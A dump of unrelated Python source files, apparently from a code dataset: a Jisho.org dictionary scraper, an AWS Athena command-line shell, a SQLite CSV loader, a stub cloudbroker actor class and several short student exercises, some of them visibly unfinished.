kana += furigana
kanaEnding = []
for i in reversed(range(len(unlifted))):
if not re.search(kanjiRegex, unlifted[i]):
kanaEnding.append(unlifted[i])
else:
break
kana += ''.join(kanaEnding[::-1])
else:
kanji += unlifted
kana += unlifted
else:
text = str(child).strip()
if text:
kanji += text
kana += text
return kanji, kana
def get_pieces(sentenceElement):
pieceElements = sentenceElement.select("li.clearfix") + sentenceElement.select("el")
pieces = []
for pieceElement in pieceElements:
if pieceElement.name == 'li':
pieces.append({
'lifted': pieceElement.select_one("span.furigana").text if pieceElement.select_one("span.furigana") is not None else '',
'unlifted': pieceElement.select_one("span.unlinked").text if pieceElement.select_one("span.unlinked") is not None else '',
})
else:
pieces.append({
'lifted': '',
'unlifted': pieceElement.text,
})
return pieces
def parseExampleDiv(div):
english = str(div.select_one('span.english').find(text=True))
kanji, kana = get_kanji_and_kana(div)
return english, kanji, kana, get_pieces(div)
def parse_example_page_data(pageHtml, phrase):
string_page_html = str(pageHtml)
# pageHtmlReplaced = re.sub(
# r'</li>\s*([^\s<>]+)\s*<li class="clearfix">', r'</li><el>\1</el><li class="clearfix">', string_page_html)
# myhtml = BeautifulSoup(pageHtmlReplaced, 'lxml')
divs = pageHtml.select("div.sentence_content")
results = []
for div in divs:
# div = divs.eq(i)
results.append(parseExampleDiv(div))
return {
'query': phrase,
'found': len(results) > 0,
'result': results,
'uri': uri_for_search(phrase, filter="sentences"),
'phrase': phrase
}
# PHRASE SCRAPE FUNCTIONS START
def get_tags(my_html):
tags = []
tagElements = my_html.select("span.concept_light-tag")
for tagElement in tagElements:
tags.append(tagElement.text)
return tags
def get_meanings_other_forms_and_notes(my_html):
otherForms = []
notes = []
meaningsWrapper = my_html.select_one(
'#page_container > div > div > article > div > div.concept_light-meanings.medium-9.columns > div')
meaningsChildren = meaningsWrapper.children
meanings = []
mostRecentWordTypes = []
for child in meaningsChildren:
if child.get("class")[0] == 'meaning-tags':
mostRecentWordTypes = list(map(lambda x: x.strip().lower(), child.text.split(',')))
elif mostRecentWordTypes[0] == 'other forms':
otherForms = list(map(lambda y: ({'kanji': y[0], 'kana': y[1]}),
map(lambda x: x.replace('【', '').replace('】', '').split(' '),
child.text.split('、'))))
elif mostRecentWordTypes[0] == 'notes':
notes = child.text().split('\n')
else:
meaning = child.select_one("span.meaning-meaning").text
try:
child.select_one('.meaning-abstract').select_one('a').extract().end()
meaningAbstract = child.select_one('.meaning-abstract').text
except AttributeError:
meaningAbstract = ''
try:
supplemental = list(filter(lambda y: bool(y),
map(lambda x: x.strip(), child.select_one("span.supplemental_info").text.split(','))))
except AttributeError: # if we couldn't find supplemental info class
supplemental = []
seeAlsoTerms = []
for i in reversed(range(len(supplemental))):
supplementalEntry = supplemental[i]
if supplementalEntry.startswith('See also'):
seeAlsoTerms.append(supplementalEntry.replace('See also ', ''))
supplemental.pop(i)
sentences = []
sentenceElements = child.select_one("span.sentences > div.sentence") or []
for sentenceElement in sentenceElements:
english = sentenceElement.select_one("li.english").text
pieces = get_pieces(sentenceElement)
# remove english and furigana to get left with normal japanese
sentenceElement.select_one("li.english").extract()
# could (will) be multiple furiganas
for s in sentenceElement.select("span.furigana"):
s.extract()
japanese = sentenceElement.text
sentences.append({'english': english, 'japanese': japanese, 'pieces': pieces})
meanings.append({
'seeAlsoTerms': seeAlsoTerms,
'sentences': sentences,
'definition': meaning,
'supplemental': supplemental,
'definitionAbstract': meaningAbstract,
'tags': mostRecentWordTypes,
})
return meanings, otherForms, notes
def uri_for_phrase_scrape(searchTerm):
return f'https://jisho.org/word/{urllib.parse.quote(searchTerm)}'
def parse_phrase_page_data(pageHtml, query):
my_html = BeautifulSoup(pageHtml, "lxml")
meanings, otherForms, notes = get_meanings_other_forms_and_notes(my_html)
result = {
'found': True,
'query': query,
'uri': uri_for_phrase_scrape(query),
'tags': get_tags(my_html),
'meanings': meanings,
'other_forms': otherForms,
'notes': notes
}
return result
class Jisho:
"""
A class to interface with Jisho.org and store search results for use.
Stores html results from queries to Jisho.org as an instance variable
and
"""
def __init__(self):
self.html = None
self.response = None
def search_for_phrase(self, phrase):
"""Directly use Jisho's official API to get info on a phrase (can be multiple characters)"""
uri = uriForPhraseSearch(phrase)
return json.loads(requests.get(uri).content)
def search_for_kanji(self, kanji, depth = "shallow"):
"""Return lots of information for a *single* character"""
uri = uri_for_search(kanji, filter="kanji")
self._extract_html(uri)
return self.parse_kanji_page_data(kanji, depth)
def search_for_examples(self, phrase):
"""Return """
uri = uri_for_search(phrase, filter="sentences")
self._extract_html(uri)
return parse_example_page_data(self.html, phrase)
def scrape_for_phrase(self, phrase):
uri = uri_for_phrase_scrape(phrase)
response = requests.get(uri)
return parse_phrase_page_data(response.content, phrase)
def contains_kanji_glyph(self, kanji):
kanjiGlyphToken = f'<h1 class="character" data-area-name="print" lang="ja">{kanji}</h1>'
return kanjiGlyphToken in str(self.html)
def _get_int_between_strings(self, start_string, end_string):
string_between_strings = get_string_between_strings(self.html, start_string, end_string)
return int(string_between_strings) if string_between_strings else None
def _get_newspaper_frequency_rank(self):
frequency_section = get_string_between_strings(self.html, '<div class="frequency">', '</div>')
return get_string_between_strings(frequency_section, '<strong>', '</strong>') if frequency_section else None
def _get_yomi(self, page_html, yomiLocatorSymbol):
yomi_section = get_string_between_strings(self.html, f'<dt>{yomiLocatorSymbol}:</dt>', '</dl>')
return parse_anchors_to_array(yomi_section) or ''
def get_kunyomi(self):
return self._get_yomi(self.html, KUNYOMI_LOCATOR_SYMBOL)
def get_onyomi(self):
return self._get_yomi(self.html, ONYOMI_LOCATOR_SYMBOL)
def _get_yomi_examples(self, yomiLocatorSymbol):
locator_string = f'<h2>{yomiLocatorSymbol} reading compounds</h2>'
example_section = get_string_between_strings(self.html, locator_string, '</ul>')
if not example_section:
return []
regex = r'<li>(.*?)</li>'
regex_results = map(lambda x: x.strip(), re.findall(regex, example_section, re.DOTALL))
for example in regex_results:
example_lines = list(map(lambda x: x.strip(), example.split('\n')))
yield {
'example': example_lines[0],
'reading': example_lines[1].replace('【', '').replace('】', ''),
'meaning': html.unescape(example_lines[2]),
}
def get_onyomi_examples(self):
return self._get_yomi_examples(ONYOMI_LOCATOR_SYMBOL)
def get_kunyomi_examples(self):
return self._get_yomi_examples(KUNYOMI_LOCATOR_SYMBOL)
def get_radical(self):
radicalMeaningStartString = '<span class="radical_meaning">'
radicalMeaningEndString = '</span>'
radicalMeaning = self.html.select_one("span.radical_meaning")
# TODO: Improve this? I don't like all the string finding that much, rather do it with BS finding
if radicalMeaning:
page_html_string = str(self.html)
radicalMeaningStartIndex = page_html_string.find(radicalMeaningStartString)
radicalMeaningEndIndex = page_html_string.find(radicalMeaningEndString, radicalMeaningStartIndex)
radicalSymbolStartIndex = radicalMeaningEndIndex + len(radicalMeaningEndString)
radicalSymbolEndString = '</span>'
radicalSymbolEndIndex = page_html_string.find(radicalSymbolEndString, radicalSymbolStartIndex)
radicalSymbolsString = page_html_string[radicalSymbolStartIndex:radicalSymbolEndIndex].replace("\n", '').strip()
if len(radicalSymbolsString) > 1:
radicalForms = radicalSymbolsString[1:].replace('(', '').replace(')', '').strip().split(', ')
return {'symbol': radicalSymbolsString[0], 'forms': radicalForms, 'meaning': radicalMeaning.string.strip()}
return {'symbol': radicalSymbolsString, 'meaning': radicalMeaning.text.replace("\n", '').strip()}
return None
def get_parts(self):
parts_section = self.html.find("dt", text="Parts:").find_next_sibling('dd')
result = parse_anchors_to_array(str(parts_section))
result.sort()
return result
def get_svg_uri(self):
svg_regex = re.compile(r"var url = \'//(.*?cloudfront\.net/.*?.svg)")
regex_result = svg_regex.search(str(self.html))
return f'https://{regex_result[1]}' if regex_result else None
def parse_kanji_page_data(self, kanji, depth):
result = {'query': kanji, 'found': self.contains_kanji_glyph(kanji)}
if not result['found']:
return result
result['taughtIn'] = get_string_between_strings(self.html, 'taught in <strong>', '</strong>')
result['jlptLevel'] = get_string_between_strings(self.html, 'JLPT level <strong>', '</strong>')
result['newspaperFrequencyRank'] = self._get_newspaper_frequency_rank()
result['strokeCount'] = self._get_int_between_strings('<strong>', '</strong> strokes')
result['meaning'] = html.unescape(
get_string_between_strings(self.html, '<div class="kanji-details__main-meanings">', '</div>')).strip().replace("\n", '')
result['kunyomi'] = self.get_kunyomi()
result['onyomi'] = self.get_onyomi()
result['onyomiExamples'] = list(self.get_onyomi_examples())
result['kunyomiExamples'] = list(self.get_kunyomi_examples())
result['radical'] = self.get_radical()
result['parts'] = self.get_parts()
result['strokeOrderDiagramUri'] = getUriForStrokeOrderDiagram(kanji)
result['strokeOrderSvgUri'] = self.get_svg_uri()
result['strokeOrderGifUri'] = get_gif_uri(kanji)
result['uri'] = uri_for_search(kanji, filter="kanji")
return result
def _extract_html(self, url):
"""With the response, extract the HTML and store it into the object."""
self.response = requests.get(url, timeout=5)
self.html = BeautifulSoup(self.response.content, "lxml") if self.response.ok else None
# return self.html
def search_for_word(self, word, depth="shallow"):
"""Take a japanese word and spit out well-formatted dictionaries for each entry.
"""
# self._get_search_response(word)
self._extract_html(uri_for_search(word))
results = self.html.select(".concept_light.clearfix")
# print(results)
fmtd_results = []
if depth == "shallow":
for r in results:
fmtd_results.append(self._extract_dictionary_information(r))
elif depth == "deep":
for r in results:
fmtd_results.append(self._extract_dictionary_information(r))
# If there are more than 20 results on the page, there is no "More Words" link
more = self.html.select_one(".more")
while more:
link = more.get("href")
response = requests.get(r"http:" + link, timeout=5)
html = BeautifulSoup(response.content, "html.parser")
results = html.select(".concept_light.clearfix")
for r in results:
fmtd_results.append(self._extract_dictionary_information(r))
more = html.select_one(".more")
return fmtd_results
def _isolate_meanings(self, meanings_list):
"""Take the meanings list from the DOM and clean out non-informative meanings."""
index = self._get_meaning_cutoff_index(meanings_list)
if index:
return [m for i, m in enumerate(meanings_list) if i < index]
else:
return meanings_list
def _get_meaning_cutoff_index(self, meanings_list):
"""Takes a meaning list and extracts all the non Wiki, note, or non-definition entries."""
try:
wiki_index = [m.text == "Wikipedia defintiion" for m in meanings_list].index(True)
except ValueError:
wiki_index = False
try:
other_forms_index = [m.text == "Other forms" for m in meanings_list].index(True)
except ValueError:
other_forms_index = False
try:
notes_index = [m.text == "Notes" for m in meanings_list].index(True)
except ValueError:
notes_index = False
return wiki_index or other_forms_index or notes_index or None
def _extract_dictionary_information(self, entry):
"""Take a dictionary entry from Jisho and return all the necessary information."""
# Clean up the furigana for the result
furigana = "".join([f.text for f in entry.select(".kanji")])
# Cleans the vocabulary word for the result
vocabulary = self._get_full_vocabulary_string(entry) if not entry.select(".concept_light-representation .furigana rt") else entry.select_one(".concept_light-representation .furigana rt").text
# The fact that this needs to exist is really annoying.
# If you go to a page like this: https://jisho.org/word/%E5%8D%B0%E5%BA%A6
# you'll see that this is a word whose furigana is actually in katakana
# I didn't realize this happens (it makes sense now), and the huge issue
# is that there's different HTML in this case, so the previous parsing method
# doesn't work, so we need a new method...
# Now there could be *really* weird cases where there's a word with both
# katakana furigana and hiragana furigana (which would be cool), but tbh this
# I'm satisfied with assuming the whole word corresponds with the whole furigana.
# Grab the difficulty tags for the result
diff_tags = [m.text for m in entry.select(".concept_light-tag.label")]
# Grab each of the meanings associated with the result
cleaned_meanings = self._isolate_meanings(entry.select_one(".meanings-wrapper"))
meanings = [m.select_one(".meaning-meaning") for m in cleaned_meanings]
meanings_texts = [m.text for m in meanings if m != None]
# Romanize the furigana
halpern = kana_to_halpern(furigana)
information = {
"furigana": furigana,
"vocabulary": vocabulary,
"difficulty_tags": diff_tags,
"meanings": dict(zip(range(1, len(meanings_texts) + 1), meanings_texts)),
"n_meanings": len(meanings_texts),
"halpern": halpern
}
return information
def _get_full_vocabulary_string(self, html):
"""Return the full furigana of a word from the html."""
# The kana represntation of the Jisho entry is contained in this div
text_markup = html.select_one(".concept_light-representation")
upper_furigana = text_markup.select_one(".furigana").find_all('span')
# inset_furigana needs more formatting due to potential bits of kanji sticking together
inset_furigana_list = []
# For some reason, creating the iterator "inset_furigana" and then accessing it here
# causes it to change, like observing it causes it to change. I feel like Schrodinger
for f in text_markup.select_one(".text").children:
cleaned_text = f.string.replace("\n", "").replace(" ", "")
if cleaned_text == "":
continue
elif len(cleaned_text) > 1:
for s in cleaned_text:
inset_furigana_list.append(s)
else:
inset_furigana_list.append(cleaned_text)
children = zip_longest(upper_furigana, inset_furigana_list)
full_word = []
for c in children:
if c[0].text != '':
full_word.append(c[0].text)
elif c[0].text == '' and contains_kana(c[1]):
full_word.append(c[1])
else:
continue
# print(''.join(full_word))
# print("====")
return ''.join(full_word)
if __name__ == '__main__':
j = Jisho()
j.search_for_kanji("草")
|
12,786 | ed2c934a069db8cdcd728e1f3ed9437655395df7 | # 2. Создать текстовый файл (не программно), сохранить в нем несколько строк,
# выполнить подсчет количества строк, количества слов в каждой строке.
with open('task2.txt', 'r') as f:
lines = f.readlines()
for index, line in enumerate(lines):
print(f'{index + 1}: {len(line.split())}') |
12,787 | 2a0a0fe0f527a76401ed930319f7099d9ccce8d2 | """
__author__ = Biswajit Saha
this script creates sqllite schema and batch-loads all csv od matrix
"""
import sqlite3
from sqlalchemy import create_engine
from sqlalchemy import Table, Column, Integer,Float, String, MetaData,Index
import pandas as pd
from pathlib import Path
import time
import logging
def create_logger():
# logger = multiprocessing.get_logger()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler("db.log")
fh.setLevel(logging.INFO)
fmt = '%(asctime)s - %(levelname)s - %(message)s'
formatter = logging.Formatter(fmt)
fh.setFormatter(formatter)
logger.addHandler(fh)
#adding console handler
consolehandler = logging.StreamHandler()
consolehandler.setLevel(logging.DEBUG)
consolehandler.setFormatter(formatter)
logger.addHandler(consolehandler)
return logger
logger = create_logger()
def measure(message):
def decorator(function):
def wrapper(*args, **kwargs):
ts =time.time()
result = function(*args, **kwargs)
te = time.time()
minutes_taken = "minutes taken {}".format((te-ts)/60.0)
logger.info(f"{message} {minutes_taken}")
return result
return wrapper
return decorator
class Db:
def __init__(self,name):
self.dbname =name
self.engine = create_engine(f"sqlite:///{self.dbname}.sqlite3")
def create_table(self,if_exists_drop=False):
metadata = MetaData()
MATRIX = Table('matrix', metadata,
Column('id', Integer, primary_key=True),
Column('meshblock_id', String(50)),
Column('centre_name', String(100)),
Column('stop_id', String(50)),
Column('time_of_day', String(50)),
Column('total_minutes', Float),
Index("IDX_CENTRENAME_TIMEOFDAY_MINUTES", "centre_name", "time_of_day",'total_minutes' )
)
if MATRIX.exists(self.engine):
if if_exists_drop:
MATRIX.drop(self.engine)
MATRIX.create(self.engine)
print('table re-created')
else:
print('table already exists')
else:
MATRIX.create(self.engine)
print('new table created')
self.table = MATRIX
def reindex(self):
#self.engine.execute(sql)
pass
@measure('total:')
def load_csv(self,csv):
df = pd.read_csv(csv)
df.to_sql('matrix',self.engine,if_exists='append',index =False)
print(f'{csv} loaded')
def __del__(self):
self.engine.dispose()
@measure('Grand Total:')
def load_all_csvs():
mydb = Db('CentreAccesByMb')
mydb.create_table(True)
csvdir = Path().cwd().parent.joinpath('output').joinpath('matrix')
for idx, f in enumerate(csvdir.glob('*.csv')):
mydb.load_csv(f)
print(f'{idx+1} completed ...')
del mydb
print('done!')
if __name__ =='__main__':
load_all_csvs()
|
12,788 | f8869869be0fd265c88b2ada43bdf026981b78f5 | #!/usr/bin/env python
# coding=utf-8
'''
@Description:
@Author: Xuannan
@Date: 2020-01-31 10:46:21
@LastEditTime : 2020-01-31 13:20:33
@LastEditors : Xuannan
'''
from .category import MaitulCategory
from .content import MaitulContent,MaitulContentTag
from .tag import MaitulTag |
12,789 | a1cacb70408fc7d69beda88707e17ec39fe52f6f | #!/usr/bin/env python3
"""
Consider a list (rollnos) containing roll numbers of 20MS students in the
format 20MSid (e.g. 20MS145, here id = 145). Use list comprehension to store
the roll nos in rollnos in a list ‘GroupA’ where id < 150 and store the rest in
another list ‘GroupB’. Print the contents of GroupA and GroupB.
"""
rollnos = ["20MS001", "20MS123", "20MS149", "20MS150", "20MS151", "20MS172"]
groupA = [s for s in rollnos if int(s[4:]) < 150]
groupB = [s for s in rollnos if s not in groupA]
print("Roll numbers : ", rollnos)
print("Group A : ", groupA)
print("Group B : ", groupB)
|
12,790 | 8367c2ecad20aadd406d60aeb665e40275982ea9 | # 2. Во втором массиве сохранить индексы четных элементов первого массива.
# Например, если дан массив со значениями 8, 3, 15, 6, 4, 2, то во второй массив надо заполнить
# значениями 0, 3, 4, 5 , т.к. именно в этих позициях первого массива стоят четные числа.
import random
ARRAY_SIZE = 10
VALUES_LOWER_BOUND = 1
VALUES_UPPER_BOUND = 10
input_array = [random.randint(VALUES_LOWER_BOUND, VALUES_UPPER_BOUND) for _ in range (ARRAY_SIZE)]
print('Входной массив:')
print(input_array)
output_array = [j for j in range(len(input_array)) if input_array[j]%2 == 0]
print('Массив индексов четных элементов:')
print(output_array) |
12,791 | dd395cb68109ff51299a37dbd9297e023e4322c3 | import Deque
def arrange(aList):
arranged = []
d = Deque.Deque()
for item in aList:
if item < 0:
d.add_rear(item)
else:
d.add_front(item)
while not d.is_empty():
arranged.append(d.remove_rear())
return arranged
print(arrange([-3,12,6,-7]))
arrange()
|
12,792 | c1dbde93e572046cba54bc2be924459e407d3136 | from tkinter import *
master = Tk()
master.geometry('600x400')
master.config(bg='skyblue')
master.title('Second Screen')
# Calculating Age
age = Label(master, text='Please Enter Your Age:', borderwidth=5)
age.place(x=10, y=10)
age_entry = Entry(master, borderwidth=5)
age_entry.place(x=200, y=10)
from datetime import date, timedelta
dob = date(1999, 1, 20)
age = (date.today() - dob)//timedelta(days=365.245)
def age():
age = ['16']
for x in range(len(age)):
if age_entry.get() == age[x]
master.mainloop()
|
12,793 | e20ac1e43a1218eeb9108012a9319f7b0751245a | import re
f = open("dates",'r')
mon = {'01': 'January', '02': 'February', '03': 'March',
'04': 'April', '05': 'May', '06': 'June',
'07': 'July', '08': 'August', '09': 'September',
'10': 'October', '11': 'November', '12': 'December'}
r1 = re.compile("(\d*)-(\d*)-(\d*)\s*(\d*):(\d*):(\d*)")
def convert(line):
m = r1.match(line)
if m != None:
year = int(m.group(1))
month = m.group(2)
day = int(m.group(3))
hour = int(m.group(4))
minute = int(m.group(5))
seconds = int(m.group(6))
if (hour >= 12):
time = "pm"
else:
time = "am"
if (hour == 0):
hour = 12;
if (hour != 12):
hour = hour % 12;
#10:03 pm, April 20, 2004
print '%d:%02d %s, %s %d, %d' % (hour,minute,time, mon[month],day,year)
while True:
line = f.readline()
convert(line)
if not line:
break
|
12,794 | f79f9bdfc66a2394d3d44c4d9eb327b10ad4875f |
import argparse
import atexit
import csv
import json
import os
import readline
import subprocess
import sys
import time
import uuid
import boto3
import botocore
import cmd2 as cmd
from botocore.exceptions import ClientError, ParamValidationError
from tabulate import tabulate
LESS = "less -FXRSn"
HISTORY_FILE_SIZE = 500
__version__ = '0.1.8'
class AthenaBatch(object):
def __init__(self, athena, db=None, format='CSV'):
self.athena = athena
self.dbname = db
self.format = format
def execute(self, statement):
execution_id = self.athena.start_query_execution(self.dbname, statement)
if not execution_id:
return
while True:
stats = self.athena.get_query_execution(execution_id)
status = stats['QueryExecution']['Status']['State']
if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
break
time.sleep(0.2) # 200ms
if status == 'SUCCEEDED':
results = self.athena.get_query_results(execution_id)
headers = [h['Name'].encode("utf-8") for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]
if self.format in ['CSV', 'CSV_HEADER']:
csv_writer = csv.writer(sys.stdout, quoting=csv.QUOTE_ALL)
if self.format == 'CSV_HEADER':
csv_writer.writerow(headers)
csv_writer.writerows([[text.encode("utf-8") for text in row] for row in self.athena.yield_rows(results, headers)])
elif self.format == 'TSV':
print(tabulate([row for row in self.athena.yield_rows(results, headers)], tablefmt='tsv'))
elif self.format == 'TSV_HEADER':
print(tabulate([row for row in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='tsv'))
elif self.format == 'VERTICAL':
for num, row in enumerate(self.athena.yield_rows(results, headers)):
print('--[RECORD {}]--'.format(num+1))
print(tabulate(zip(*[headers, row]), tablefmt='presto'))
else: # ALIGNED
print(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto'))
if status == 'FAILED':
print(stats['QueryExecution']['Status']['StateChangeReason'])
try:
del cmd.Cmd.do_show # "show" is an Athena command
except AttributeError:
# "show" was removed from Cmd2 0.8.0
pass
class AthenaShell(cmd.Cmd, object):
multilineCommands = ['WITH', 'SELECT', 'ALTER', 'CREATE', 'DESCRIBE', 'DROP', 'MSCK', 'SHOW', 'USE', 'VALUES']
allow_cli_args = False
def __init__(self, athena, db=None):
cmd.Cmd.__init__(self)
self.athena = athena
self.dbname = db
self.execution_id = None
self.row_count = 0
self.set_prompt()
self.pager = os.environ.get('ATHENA_CLI_PAGER', LESS).split(' ')
self.hist_file = os.path.join(os.path.expanduser("~"), ".athena_history")
self.init_history()
def set_prompt(self):
self.prompt = 'athena:%s> ' % self.dbname if self.dbname else 'athena> '
def cmdloop_with_cancel(self, intro=None):
try:
self.cmdloop(intro)
except KeyboardInterrupt:
if self.execution_id:
self.athena.stop_query_execution(self.execution_id)
print('\n\n%s' % self.athena.console_link(self.execution_id))
print('\nQuery aborted by user')
else:
print('\r')
self.cmdloop_with_cancel(intro)
def preloop(self):
if os.path.exists(self.hist_file):
readline.read_history_file(self.hist_file)
def postloop(self):
self.save_history()
def init_history(self):
try:
readline.read_history_file(self.hist_file)
readline.set_history_length(HISTORY_FILE_SIZE)
readline.write_history_file(self.hist_file)
except IOError:
readline.write_history_file(self.hist_file)
atexit.register(self.save_history)
def save_history(self):
try:
readline.write_history_file(self.hist_file)
except IOError:
pass
def do_help(self, arg):
help_output = """
Supported commands:
QUIT
SELECT
ALTER DATABASE <schema>
ALTER TABLE <table>
CREATE DATABASE <schema>
CREATE TABLE <table>
DESCRIBE <table>
DROP DATABASE <schema>
DROP TABLE <table>
MSCK REPAIR TABLE <table>
SHOW COLUMNS FROM <table>
SHOW CREATE TABLE <table>
SHOW DATABASES [LIKE <pattern>]
SHOW PARTITIONS <table>
SHOW TABLES [IN <schema>] [<pattern>]
SHOW TBLPROPERTIES <table>
USE [<catalog>.]<schema>
VALUES row [, ...]
See http://docs.aws.amazon.com/athena/latest/ug/language-reference.html
"""
print(help_output)
def do_quit(self, arg):
print()
return -1
def do_EOF(self, arg):
return self.do_quit(arg)
def do_use(self, schema):
self.dbname = schema.rstrip(';')
self.set_prompt()
def do_set(self, arg):
try:
statement, param_name, val = arg.parsed.raw.split(None, 2)
val = val.strip()
param_name = param_name.strip().lower()
if param_name == 'debug':
self.athena.debug = cmd.cast(True, val)
except (ValueError, AttributeError):
self.do_show(arg)
super(AthenaShell, self).do_set(arg)
def default(self, line):
self.execution_id = self.athena.start_query_execution(self.dbname, line.full_parsed_statement())
if not self.execution_id:
return
while True:
stats = self.athena.get_query_execution(self.execution_id)
status = stats['QueryExecution']['Status']['State']
status_line = 'Query {0}, {1:9}'.format(self.execution_id, status)
sys.stdout.write('\r' + status_line)
sys.stdout.flush()
if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
break
time.sleep(0.2) # 200ms
sys.stdout.write('\r' + ' ' * len(status_line) + '\r') # delete query status line
sys.stdout.flush()
if status == 'SUCCEEDED':
results = self.athena.get_query_results(self.execution_id)
headers = [h['Name'] for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]
row_count = len(results['ResultSet']['Rows'])
if headers and len(results['ResultSet']['Rows']) and results['ResultSet']['Rows'][0]['Data'][0].get('VarCharValue', None) == headers[0]:
row_count -= 1 # don't count header
process = subprocess.Popen(self.pager, stdin=subprocess.PIPE)
process.stdin.write(tabulate([x for x in self.athena.yield_rows(results, headers)], headers=headers, tablefmt='presto').encode('utf-8'))
process.communicate()
print('(%s rows)\n' % row_count)
print('Query {0}, {1}'.format(self.execution_id, status))
if status == 'FAILED':
print(stats['QueryExecution']['Status']['StateChangeReason'])
print(self.athena.console_link(self.execution_id))
submission_date = stats['QueryExecution']['Status']['SubmissionDateTime']
completion_date = stats['QueryExecution']['Status']['CompletionDateTime']
execution_time = stats['QueryExecution']['Statistics']['EngineExecutionTimeInMillis']
data_scanned = stats['QueryExecution']['Statistics']['DataScannedInBytes']
query_cost = data_scanned / 1000000000000.0 * 5.0
print('Time: {}, CPU Time: {}ms total, Data Scanned: {}, Cost: ${:,.2f}\n'.format(
str(completion_date - submission_date).split('.')[0],
execution_time,
human_readable(data_scanned),
query_cost
))
class Athena(object):
def __init__(self, profile, region=None, bucket=None, debug=False, encryption=False):
self.session = boto3.Session(profile_name=profile, region_name=region)
self.athena = self.session.client('athena')
self.region = region or os.environ.get('AWS_DEFAULT_REGION', None) or self.session.region_name
self.bucket = bucket or self.default_bucket
self.debug = debug
self.encryption = encryption
@property
def default_bucket(self):
account_id = self.session.client('sts').get_caller_identity().get('Account')
return 's3://{}-query-results-{}-{}'.format(self.session.profile_name or 'aws-athena', account_id, self.region)
def start_query_execution(self, db, query):
try:
if not db:
raise ValueError('Schema must be specified when session schema is not set')
result_configuration = {
'OutputLocation': self.bucket,
}
if self.encryption:
result_configuration['EncryptionConfiguration'] = {
'EncryptionOption': 'SSE_S3'
}
return self.athena.start_query_execution(
QueryString=query,
ClientRequestToken=str(uuid.uuid4()),
QueryExecutionContext={
'Database': db
},
ResultConfiguration=result_configuration
)['QueryExecutionId']
except (ClientError, ParamValidationError, ValueError) as e:
print(e)
return
def get_query_execution(self, execution_id):
try:
return self.athena.get_query_execution(
QueryExecutionId=execution_id
)
except ClientError as e:
print(e)
def get_query_results(self, execution_id):
try:
results = None
paginator = self.athena.get_paginator('get_query_results')
page_iterator = paginator.paginate(
QueryExecutionId=execution_id
)
for page in page_iterator:
if results is None:
results = page
else:
results['ResultSet']['Rows'].extend(page['ResultSet']['Rows'])
except ClientError as e:
sys.exit(e)
if self.debug:
print(json.dumps(results, indent=2))
return results
def stop_query_execution(self, execution_id):
try:
return self.athena.stop_query_execution(
QueryExecutionId=execution_id
)
except ClientError as e:
sys.exit(e)
@staticmethod
def yield_rows(results, headers):
for row in results['ResultSet']['Rows']:
# https://forums.aws.amazon.com/thread.jspa?threadID=256505
if headers and row['Data'][0].get('VarCharValue', None) == headers[0]:
continue # skip header
yield [d.get('VarCharValue', 'NULL') for d in row['Data']]
def console_link(self, execution_id):
return 'https://{0}.console.aws.amazon.com/athena/home?force®ion={0}#query/history/{1}'.format(self.region, execution_id)
def human_readable(size, precision=2):
suffixes = ['B', 'KB', 'MB', 'GB', 'TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 4:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision, size, suffixes[suffixIndex])
def main():
parser = argparse.ArgumentParser(
prog='athena',
usage='athena [--debug] [--execute <statement>] [--output-format <format>] [--schema <schema>]'
' [--profile <profile>] [--region <region>] [--s3-bucket <bucket>] [--server-side-encryption] [--version]',
description='Athena interactive console'
)
parser.add_argument(
'--debug',
action='store_true',
help='enable debug mode'
)
parser.add_argument(
'--execute',
metavar='STATEMENT',
help='execute statement in batch mode'
)
parser.add_argument(
'--output-format',
dest='format',
help='output format for batch mode [ALIGNED, VERTICAL, CSV, TSV, CSV_HEADER, TSV_HEADER, NULL]'
)
parser.add_argument(
'--schema',
'--database',
'--db',
help='default schema'
)
parser.add_argument(
'--profile',
help='AWS profile'
)
parser.add_argument(
'--region',
help='AWS region'
)
parser.add_argument(
'--s3-bucket',
'--bucket',
dest='bucket',
help='AWS S3 bucket for query results'
)
parser.add_argument(
'--server-side-encryption',
'--encryption',
dest='encryption',
action='store_true',
help='Use server-side-encryption for query results'
)
parser.add_argument(
'--version',
action='store_true',
help='show version info and exit'
)
args = parser.parse_args()
if args.debug:
boto3.set_stream_logger(name='botocore')
if args.version:
print('Athena CLI %s' % __version__)
sys.exit()
profile = args.profile or os.environ.get('AWS_DEFAULT_PROFILE', None) or os.environ.get('AWS_PROFILE', None)
try:
athena = Athena(profile, region=args.region, bucket=args.bucket, debug=args.debug, encryption=args.encryption)
except botocore.exceptions.ClientError as e:
sys.exit(e)
if args.execute:
batch = AthenaBatch(athena, db=args.schema, format=args.format)
batch.execute(statement=args.execute)
else:
shell = AthenaShell(athena, db=args.schema)
shell.cmdloop_with_cancel()
if __name__ == '__main__':
main()
|
12,795 | 486af34172763e20a9d3f323aa20748292d3230e | from js9 import j
class cloudbroker_location(j.tools.code.classGetBase()):
"""
Operator actions for handling interventions on a a grid
"""
def __init__(self):
pass
self._te={}
self.actorname="location"
self.appname="cloudbroker"
#cloudbroker_location_osis.__init__(self)
def add(self, name, **kwargs):
"""
Adds a location/grid
param:name Name of the location
result
"""
#put your code here to implement this method
raise NotImplementedError ("not implemented method add")
def checkVMs(self, locationId, **kwargs):
"""
Run checkvms jumpscript
param:locationId id of the grid
result
"""
#put your code here to implement this method
raise NotImplementedError ("not implemented method checkVMs")
def delete(self, locationId, **kwargs):
"""
Delete location
param:locationId id of the location
result
"""
#put your code here to implement this method
raise NotImplementedError ("not implemented method delete")
def purgeLogs(self, locationId, age, **kwargs):
"""
Remove logs & eco’s
By default the logs en eco's older than than 1 week but this can be overriden
param:locationId id of the grid
param:age by default 1 week (-1h, -1w TODO: check the options in the jsgrid purgelogs)
result
"""
#put your code here to implement this method
raise NotImplementedError ("not implemented method purgeLogs")
def update(self, locationId, name, apiUrl, apiToken, **kwargs):
"""
Rename a grid/location
param:locationId id of the location
param:name New name of the location
param:apiUrl New API URL
param:apiToken Token to authenticate with api
result
"""
#put your code here to implement this method
raise NotImplementedError ("not implemented method update")
|
